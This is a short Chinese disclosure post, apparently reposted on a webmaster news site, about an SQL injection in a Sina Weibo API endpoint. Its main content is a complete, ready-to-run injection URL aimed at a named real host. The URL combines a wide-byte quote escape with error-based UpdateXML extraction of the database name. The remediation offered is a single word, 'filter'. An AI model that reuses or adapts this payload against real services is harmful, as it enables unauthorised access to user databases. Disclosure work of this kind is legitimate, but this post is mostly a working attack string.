新浪某API接口SQL注射下载

新浪某API接口SQL注射,好像是重要的库,没细测。

http://api.sina.com.cn/weibo/wb/users_show.json?uid=1787467502%df',0,UpdateXML(1,CONCAT(0x5b,mid((SELECT database()),1,32),0x5d),1),1397571500)%23&source=2835469272&callback=STK_13975707689683

修复方案:

过滤

上一篇: [公开漏洞]迅雷某分站SQL注入Root权限可限制关键词
下一篇: Srun3000计费系统注入漏洞下载
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细